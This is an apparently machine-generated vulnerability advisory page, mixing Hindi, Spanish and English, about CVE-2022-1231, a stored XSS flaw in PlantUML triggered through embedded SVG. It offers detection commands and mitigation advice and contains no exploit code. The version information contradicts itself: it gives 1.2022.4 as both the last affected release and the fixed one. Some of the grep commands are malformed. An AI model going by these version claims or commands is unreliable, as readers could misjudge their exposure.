प्लेटफ़ॉर्म
java
घटक
plantuml
में ठीक किया गया
1.2022.4
CVE-2022-1231 describes a critical Stored Cross-Site Scripting (XSS) vulnerability within PlantUML, a popular diagramming tool. This vulnerability allows attackers to inject malicious scripts through embedded SVGs within PlantUML diagrams, potentially leading to severe consequences like data theft and account takeover. The vulnerability affects versions of PlantUML up to 1.2022.4, and a fix is available in version 1.2022.4.
The impact of CVE-2022-1231 is significant, particularly for web applications that integrate PlantUML diagrams. Attackers can embed malicious SVG code within a diagram, which, when rendered by a PlantUML-enabled application, executes the script in the user's browser context. This can lead to the theft of sensitive information, such as session cookies and authentication tokens, allowing attackers to hijack user accounts. The use of clickable links within SVGs, common in PlantUML plugins for platforms like Confluence, amplifies the risk. Successful exploitation could also lead to code execution within desktop applications that utilize PlantUML, expanding the potential attack surface.
CVE-2022-1231 was publicly disclosed on April 15, 2022. While no active exploitation campaigns have been definitively confirmed, the vulnerability's severity and ease of exploitation make it a likely target. The presence of public proof-of-concept code increases the risk of exploitation. It is not currently listed on CISA KEV, but its criticality warrants close monitoring.
Organizations and individuals using PlantUML within web applications, particularly those leveraging PlantUML plugins for platforms like Confluence, are at significant risk. Legacy systems running older, unpatched versions of PlantUML are especially vulnerable. Shared hosting environments where multiple users share the same PlantUML installation are also at increased risk.
• linux / server:
journalctl -u plantuml | grep -i "svg" -i "xss"• generic web:
curl -I <plantuml_diagram_url> | grep -i "svg"• wordpress / composer / npm:
grep -r "<svg" /var/www/html/wp-content/plugins/plantuml/disclosure
poc
एक्सप्लॉइट स्थिति
EPSS
0.20% (42% शतमक)
CVSS वेक्टर
The primary mitigation for CVE-2022-1231 is to immediately upgrade PlantUML to version 1.2022.4 or later. If upgrading is not immediately feasible due to compatibility issues or breaking changes, consider implementing input validation and sanitization on all PlantUML diagrams before rendering them. Web application firewalls (WAFs) can be configured to detect and block requests containing suspicious SVG code. Monitor PlantUML logs for unusual activity, particularly requests containing large or complex SVG content. After upgrading, verify the fix by attempting to embed a known malicious SVG payload and confirming that it is not executed.
Actualice la biblioteca plantuml/plantuml a la versión 1.2022.4 o superior. Esto corrige la vulnerabilidad XSS que permite la ejecución de código arbitrario a través de SVG embebido en diagramas SVG.
भेद्यता विश्लेषण और गंभीर अलर्ट सीधे आपके ईमेल में।
CVE-2022-1231 is a critical Stored XSS vulnerability affecting PlantUML versions up to 1.2022.4. It allows attackers to inject malicious scripts through embedded SVGs, potentially leading to account hijacking and data theft.
If you are using PlantUML version 1.2022.4 or earlier, you are vulnerable to this XSS attack. Assess your deployments immediately.
Upgrade PlantUML to version 1.2022.4 or later to resolve this vulnerability. If immediate upgrade is not possible, implement input validation and WAF rules.
While no confirmed active exploitation campaigns are publicly known, the vulnerability's severity and ease of exploitation make it a likely target. Monitor your systems closely.
Refer to the PlantUML security advisory for detailed information and updates: https://plantuml.com/de/running
अपनी डिपेंडेंसी फ़ाइल अपलोड करें और तुरंत जानें कि यह CVE और अन्य आपको प्रभावित करती हैं या नहीं।
अपनी pom.xml फ़ाइल अपलोड करें और तुरंत जानें कि आप प्रभावित हैं या नहीं।